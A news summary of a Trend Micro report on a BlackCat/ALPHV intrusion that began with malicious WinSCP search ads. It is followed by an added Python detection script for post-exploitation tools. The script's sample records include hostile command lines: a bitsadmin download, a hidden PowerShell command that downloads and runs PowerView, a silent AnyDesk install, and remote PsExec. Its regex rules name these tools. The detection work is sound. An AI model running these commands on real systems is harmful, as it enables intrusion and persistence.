BlackCat Abuses Search Ads with Malicious WinSCP Downloads
Category: Ransomware News | Industry: Global | Source: Trend Micro
Trend Micro's incident response team investigated a network intrusion linked to the BlackCat/ALPHV ransomware gang that began with fraudulent search advertisements promoting a download of the WinSCP file transfer application. The ad led to a page posing as a WinSCP tutorial; when the victim attempted to download the application, they were redirected to a compromised WordPress site, and the final-stage payload was then fetched from the file-sharing service 4shared. "The overall infection flow involves delivering the initial loader, fetching the bot core, and ultimately, dropping the payload, typically a backdoor," said Trend Micro.
Before Trend Micro's engagement, the attackers had already obtained top-level administrator privileges and used them to establish persistence, create backdoor access with remote management tools such as AnyDesk, steal passwords, and attempt to reach backup servers. During the intrusion the threat actors used Python scripts, batch scripts, AdFind, Cobalt Strike, PowerShell, PowerView, PsExec, BitsAdmin, and AnyDesk. Following Trend Micro's response to the incident, the "attacker was successfully evicted from the network before they could reach their goal or execute their final payload." The tactics, techniques, and procedures (TTPs) observed also allowed Trend Micro to link BlackCat to a separate intrusion in which SpyBoy Terminator, a tool built specifically to disable EDR and security monitoring agents, was deployed.
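The tooling listed above is where defenders get their first realistic chance to catch this chain: none of these utilities is malware on its own, but several of them appearing on one host in a short window is exactly the post-exploitation pattern the report describes. The following is an added example written for this page, not code from Trend Micro or from the report. It runs a small set of command-line detection rules for AdFind, BITSAdmin, PsExec, PowerView and AnyDesk over constructed process-creation records (Sysmon Event ID 1 style, reduced to a few fields), then groups hits per host so that a workstation chaining several behaviours is escalated while a lone hit stays low priority. The hostnames, users, paths, IP address and command lines are invented sample data, and the regex patterns are assumptions about how these tools are commonly invoked rather than indicators taken from the report.

```python
"""Detection sweep for the post-exploitation tooling named in the report.

Added example, not from Trend Micro. Matches constructed process-creation
records against command-line patterns for AdFind, BITSAdmin, PsExec,
PowerView and AnyDesk, then groups hits by host.
"""
import re
from collections import defaultdict

# Constructed sample records. Hostnames, users, paths and the IP are invented.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "CORP\\jdoe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c adfind.exe -f "(objectcategory=computer)" > ad_computers.txt'},
    {"host": "WS01", "user": "CORP\\jdoe",
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job1 /download /priority high http://203.0.113.10/a.bin C:\ProgramData\a.bin"},
    {"host": "WS01", "user": "CORP\\jdoe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/PowerView.ps1'); Invoke-ShareFinder"},
    {"host": "WS01", "user": "CORP\\jdoe",
     "image": r"C:\ProgramData\AnyDesk.exe",
     "cmdline": r"C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent"},
    {"host": "SRV-FILE01", "user": "CORP\\svc_backup",
     "image": r"C:\Windows\PsExec64.exe",
     "cmdline": r"PsExec64.exe \\SRV-BACKUP01 -s -d cmd.exe /c whoami"},
    # Benign administrative activity that must not trip any rule.
    {"host": "WS02", "user": "CORP\\asmith",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\Scripts\rotate_logs.ps1"},
    {"host": "WS02", "user": "CORP\\asmith",
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /list /allusers"},
]

# (rule name, compiled regex over the command line). The patterns are
# assumptions about typical invocations of these tools, not IOCs from the report.
RULES = [
    ("adfind_enum", re.compile(r"\badfind(\.exe)?\b.*?(-f\b|objectcategory|-sc\b)", re.I)),
    ("bitsadmin_download", re.compile(r"\bbitsadmin(\.exe)?\b.*?/(transfer|addfile|download)\b", re.I)),
    ("psexec_remote", re.compile(r"\bpsexec(64)?(\.exe)?\b.*?\\\\[\w.-]+", re.I)),
    ("powerview_load", re.compile(r"powershell.*?(PowerView|Get-Net\w+|Get-Domain\w+|Invoke-ShareFinder)", re.I)),
    ("anydesk_silent_install", re.compile(r"\banydesk(\.exe)?\b.*?--(install|silent|start-with-win|set-password)\b", re.I)),
]


def match_rules(event):
    """Return the names of all rules whose pattern matches the event's command line."""
    cmd = event.get("cmdline", "")
    return [name for name, rx in RULES if rx.search(cmd)]


def sweep(events):
    """Group rule hits by host: {host: {rule_name: [cmdline, ...]}}.

    Hosts with no hits never appear in the result.
    """
    hits = defaultdict(lambda: defaultdict(list))
    for ev in events:
        for name in match_rules(ev):
            hits[ev["host"]][name].append(ev["cmdline"])
    return hits


def triage(events, threshold=3):
    """Hosts on which at least `threshold` distinct rule categories fired.

    A single bitsadmin transfer or PsExec run is noisy on its own; several
    distinct post-exploitation behaviours on one host is the pattern worth
    escalating to incident response.
    """
    return sorted(host for host, rules in sweep(events).items() if len(rules) >= threshold)


if __name__ == "__main__":
    for host, rules in sweep(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(sorted(rules))}")
    print("escalate:", triage(SAMPLE_EVENTS))
```

In a real deployment the records would come from Sysmon, an EDR, or a SIEM query rather than an inline list, and the threshold and window would be tuned per environment; the point is the correlation step, since each of these tools also has legitimate administrative uses.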